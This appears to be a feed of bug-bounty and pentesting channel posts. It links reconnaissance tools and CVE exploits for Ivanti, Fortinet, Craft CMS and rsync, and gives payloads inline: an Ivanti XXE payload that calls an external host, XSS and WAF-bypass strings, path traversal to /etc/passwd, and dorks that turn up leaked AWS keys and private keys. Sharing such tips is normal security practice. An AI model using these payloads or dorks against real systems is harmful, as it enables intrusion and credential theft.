SpideyX - A web reconnaissance penetration testing tool for penetration testers and ethical hackers that includes multiple modes with asynchronous concurrent performance. SpideyX has 3 separate modes, and each mode is used for a different approach and different methods. SpideyX is one tool but it is equal to 3 tools because it has the ability to do crawling, JS scraping, and parameter fuzzing.
https://github.com/RevoltSecurities/Spideyx
#tools #cybersec #bugbountytips
⚡2👏2
⚡️ Poc CVE-2025-0282
✅ Ivanti Connect Secure zero-day
Hunter :
product.name="Ivanti Connect Secure"||product.name="Ivanti Policy Secure"||product.name="Ivanti Neurons for ZTA"
⬇️ Link:
https://github.com/absholi7ly/CVE-2025-0282-Ivanti-exploit
#poc #cve #infosec
🔥4
AungRecon
AungRecon is a comprehensive, automated reconnaissance script for web application security assessments. It performs multiple security checks and scans on a target domain, including subdomain enumeration, SQL injection, XSS, open redirects, LFI vulnerabilities, and more. The tool integrates several popular security tools, streamlining the workflow of security analysts and penetration testers.
Features :
WhatWeb Scan: Identifies technologies, plugins, and versions used by the target website.
Subdomain Enumeration: Discovers and filters alive subdomains.
Subdomain Takeover Detection: Identifies possible subdomain takeovers.
SQL Injection Detection: Searches for SQLi vulnerabilities using parameterized URLs.
Cross-Site Scripting (XSS) Detection: Scans for XSS vulnerabilities.
Open Redirect Detection: Finds possible open redirect vulnerabilities.
Local File Inclusion (LFI) Detection: Identifies possible LFI vulnerabilities.
Nuclei Vulnerability Scans: Executes multiple vulnerability templates via Nuclei.
Link:
https://github.com/aungsanoo-usa/aungrecon?tab=readme-ov-file
Installation:
Clone the repository:
git clone https://github.com/aungsanoo-usa/aungrecon.git
cd aungrecon
chmod +x install.sh
chmod +x aungrecon.sh
Usage: To run AungRecon on a target domain, simply execute the script with the following command:
./install.sh
./aungrecon.sh
👏2👍1
Injectra: Payload Injection via File Magic Numbers
Injectra is a robust tool designed for injecting custom payloads into files based on their magic numbers. By leveraging this technique, Injectra modifies files for penetration testing and security research purposes. The tool detects the file type by analyzing its magic numbers and injects the payload seamlessly into the correct position.
Features
- Magic Number-Based Payload Injection: Identifies file types using magic numbers and injects payloads precisely into their headers.
- Customizable Payloads: Supports user-defined payloads, with a default PHP-based payload for command execution.
- Broad File Type Support: Compatible with file types like zip, rar, docx, jpg, png, pdf, and more.
- Interactive CLI: Includes features like auto-completion for file paths and detailed prompts to guide users.
- Dependency Management: Automatically checks and installs required Python packages.
https://github.com/AnonKryptiQuz/Injectra
#tools #payload #injection
👍3
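A defender-side view of the technique the Injectra post describes, as an added example that is not part of the original post or the Injectra project: an upload check that trusts only the magic number accepts a file carrying a payload after a valid header, while a check that also scans the body rejects it. The function names, the marker list and the sample bytes are assumptions constructed for illustration.

```python
# Leading signatures for a few of the file types the post lists.
MAGIC_NUMBERS = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "pdf": b"%PDF-",
    "zip": b"PK\x03\x04",  # also the container format behind docx
}

# Byte sequences that should not appear in an upload stored under a web root.
# Assumed list for illustration; tune it per deployment.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script", b"<%")


def detect_type(data: bytes):
    """Return the type whose magic number prefixes the data, or None."""
    for name, magic in MAGIC_NUMBERS.items():
        if data.startswith(magic):
            return name
    return None


def naive_accept(data: bytes, allowed=("png", "jpg")) -> bool:
    """Weak check: trusts the first bytes of the file only."""
    return detect_type(data) in allowed


def find_markers(data: bytes):
    """Return (marker, first offset) for each script marker present, by offset."""
    lowered = data.lower()
    hits = [(m.decode(), lowered.find(m)) for m in SCRIPT_MARKERS if m in lowered]
    return sorted(hits, key=lambda hit: hit[1])


def strict_accept(data: bytes, allowed=("png", "jpg")) -> bool:
    """Hardened check: allowed magic number and no script marker in the body."""
    return detect_type(data) in allowed and not find_markers(data)


# Constructed samples: a PNG signature followed by filler bytes, with and
# without an inert PHP open tag placed right after the header.
CLEAN_PNG = MAGIC_NUMBERS["png"] + b"\x00" * 16
TAMPERED_PNG = MAGIC_NUMBERS["png"] + b"<?php /* inert marker */ ?>" + b"\x00" * 16

if __name__ == "__main__":
    for label, sample in (("clean", CLEAN_PNG), ("tampered", TAMPERED_PNG)):
        print(label, naive_accept(sample), strict_accept(sample), find_markers(sample))
```

Short markers such as `<%` can occur by chance in compressed image data, so this scan works best alongside re-encoding uploaded images and storing uploads where the server will not execute them.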
Finding the real IP behind Cloudflare has never been so easy. Here is a tool to search on Shodan
starting from a simple favicon
- https://github.com/pielco11/fav-up
#infosec #cybersec #bugbountytips
⚡2👍1
Quick and dirty way to find parameters vulnerable to LFI & Path Traversal & SSRF & Open Redirect:
Burp Search > Regex
\?.*=(\/\/?\w+|\w+\/|\w+(%3A|:)(\/|%2F)|%2F|[\.\w]+\.\w{2,4}[^\w])
And find potentially vulnerable SSRF params
- https://github.com/In3tinct/See-SURF
A Python-based scanner to find potential SSRF parameters in a web application. See-SURF helps you detect potential SSRF parameters and validates the finding by making a DNS/HTTP request back to your server. It can be added to your arsenal of recon while doing bug hunting/web security testing.
#SSRF #cybersec #lfi
👏2❤🔥1👍1
CVE-2024-22024, XXE on Ivanti Connect Secure
payload , encode it to base64:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r>
</r> send it to 127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest
#bugbountytips #cve #infosec
👍3
⚠️ Alert
CVE-2025-0070 and CVE-2025-0066 : Two Critical Vulnerabilities in NetWeaver AS for ABAP and ABAP Platform
📊 3.2K+ Services are found on hunter.how yearly.
🔗Hunter Link:hunter.how/list?searchVal…
👇Query
HUNTER :product.name="SAP NetWeaver AS for ABAP"
Refer:securityonline.info/critical-sap-f…
#hunterhow #infosec #infosecurity #OSINT #Vulnerability
🔥2👍1👌1
⚠️ Alert
CVE-2024-55591 : Zero-Day Vulnerability in Attacks on Fortinet Firewalls with Exposed Interfaces
🔗Hunter Link:hunter.how/list?searchVal…
👇Query
HUNTER :product.name="Fortinet Firewall"
FOFA : product="FORTINET-Firewall"
📰Refer:securityonline.info/active-exploit…
#FORTINET #hunterhow #infosec #infosecurity #OSINT #fofa #Vulnerability #zeroday
⚡2👌1
Blind XSS in Private crypto target
Payload used
"><iframesrcdoc="<script>v#116;tps://test.bxss.in";ument.>">
#bugbountytips #bugbounty #payload
🔥3
Bypass Cloudflare WAF (DOM-based XSS) ♻️
Payload:
'-alert?.(1)-'
writeup: 1337.or.id/post/stored-do…
#infosec #cybersec #bugbountytips
⚡3
🐞 Bug Bounty Tip:
If you find Web frameworks like Symfony, add /app_dev.php/_profiler/open?file=app/config/parameters.yml to the wordlist, and you may get juicy data.
#bugbountytips #tips #cybersec #bugbounty
⚡4
Uncover sensitive info with: inurl:notepad.link + keyword
Some example keywords:
aws_secret_access_key, "username=" "password=", VISA, PRIVATE KEY, "authToken="
More cool unpublished Dorks:
http://github.com/fatguru/dorks
#bugbountytip
🔥3
⚡️ XSS Payload
Payload:
1%27;--<img%20src=x%20onerror=javascript:alert(document.domain)>
#bugbountytips #xss #bugbounty #infosecc #cybersec
👏3
🚨 [CVE-2024-56145] Exploit released! 🚨
Details, PoC, and setup instructions:
🔗 https://github.com/Chocapikk/CVE-2024-56145
Learn more:
📖 https://assetnote.io/resources/research/how-an-obscure-php-footgun-led-to-rce-in-craft-cms
#bugbountytips #BugBounty
🔥2🗿1
🔖Top 25 JavaScript path files used to store sensitive information in Web Application⬇️
01. /js/config.js
02. /js/credentials.js
03. /js/secrets.js
04. /js/keys.js
05. /js/password.js
06. /js/api_keys.js
07. /js/auth_tokens.js
08. /js/access_tokens.js
09. /js/sessions.js
10. /js/authorization.js
11. /js/encryption.js
12. /js/certificates.js
13. /js/ssl_keys.js
14. /js/passphrases.js
15. /js/policies.js
16. /js/permissions.js
17. /js/privileges.js
18. /js/hashes.js
19. /js/salts.js
20. /js/nonces.js
21. /js/signatures.js
22. /js/digests.js
23. /js/tokens.js
24. /js/cookies.js
25. /js/topsecr3tdonotlook.js
#InfoSec #CyberSecurity #Hacking #BugBounty #bugbountyTools #bugbountytips #Pentest #Fuzzing
👏4⚡1
Plution is a convenient way to scan at scale for pages that are vulnerable to client side prototype pollution via a URL payload. In the default configuration, it will use a hardcoded payload that can detect 11 of the cases documented
⬇️ LINK:
- https://github.com/raverrr/plution
How to use:
Basic scan, output only to screen:
cat URLs.txt | plution
Scan with a supplied payload rather than hardcoded one:
cat URLs.txt|plution -p '__proto__.zzzc=example'
Note on custom payloads: The variable you are hoping to inject must be called or render to "zzzc". This is because 'window.zzzc' will be run on each page to verify pollution.
Output:
Passing '-o' followed by a location will output only URLs of pages that were successfully polluted.
Concurrency:
Pass the '-c' option to specify how many concurrent jobs are run (default is 5)
#infosec #cybersec #bugbountytips
👌4⚡1
⚠️ Alert ⚠️
CVE-2024-12084(CVSS 9.8) : Heap overflow that could lead to remote code execution
🔗Hunter Link:hunter.how/list?searchVal…
👇 Query
HUNTER : product.name="rsync"
FOFA : product="rsync"
SHODAN : product:"rsyncd"
📰 Refer:access.redhat.com/security/cve/C…
securityonline.info/cve-2024-12084…
sysdig.com/blog/detecting…
#RSYNC #hunterhow #infosec #infosecurity #OSINT #Vulnerability
⚡3
Before intercepting even a single request in Burp, enable the Binary and Images filter in the proxy history. It may help with catching directory traversals, such as
load_image?img=assets/imgs/logo.png with ../../../../../etc/passwd
#infosec #cybersec #bugbountytips
👌3💊2
📮 Pentesting Bluetooth: The Practical Guide to Hacking Bluetooth Low Energy
1. https://blog.attify.com/the-practical-guide-to-hacking-bluetooth-low-energy/
2. https://pentestpartners.com/security-blog/introduction-to-bluetooth-low-energy/
3. https://book.hacktricks.xyz/todo/radio-hacking/pentesting-ble-bluetooth-low-energy
#infosec #bluetooth
⚡3💊1